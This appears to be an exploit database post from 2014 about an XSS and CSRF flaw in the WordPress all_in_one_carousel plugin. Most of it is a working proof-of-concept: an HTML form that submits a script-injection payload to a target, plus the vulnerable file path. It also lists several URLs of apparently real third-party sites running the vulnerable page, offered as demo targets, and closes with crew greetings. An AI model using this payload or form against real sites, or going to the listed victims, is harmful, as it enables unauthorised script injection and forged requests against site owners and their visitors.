SecurityvulnsSECURITYVULNS:DOC:30684Wordpress all_in_one_carousel Plugin /XSS/CSRF/ Vuln
Exploit :
<center><b>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability
</center><br><br>
<html>
<head>
<title>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability [IeDb TeaM]</title>
</head><body>
<form
action=\"http://YourTarget.Com\"
id=\"formid\" method=\"post\">
<input name=\"name\" value=\'\"><script>alert(/IeDb.ir/)</script>\' /><br><br>
<input type=\"submit\" value=\"Submit\"/>
</form></body></html>
XSS Code : \"><script>alert(/IeDb.ir/)</script>
Vulnerable Page :
Localhost/[AnyPath]/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
[+] Image : http://sectime.ir/myfiles/Xss-wp.png
D3m0 :
http://www.gaffandigital.com/MattDejanovich/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://yourworldmotorsports.com/wp-content/plugins/all_in_one_carousel/all_in_one_carousel/tpl/add_carousel.php
http://www.directorphilippemartinez.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://arborhillsgreatdanes.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
http://www.revsoft.com/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
Gr33tz : All Members In IeDb.Ir/acc | Thanks : 8ThBit , Dr.3v1l And …
###########################
Iranian Exploit DataBase = http://IeDb.Ir [2014-02-04]
###########################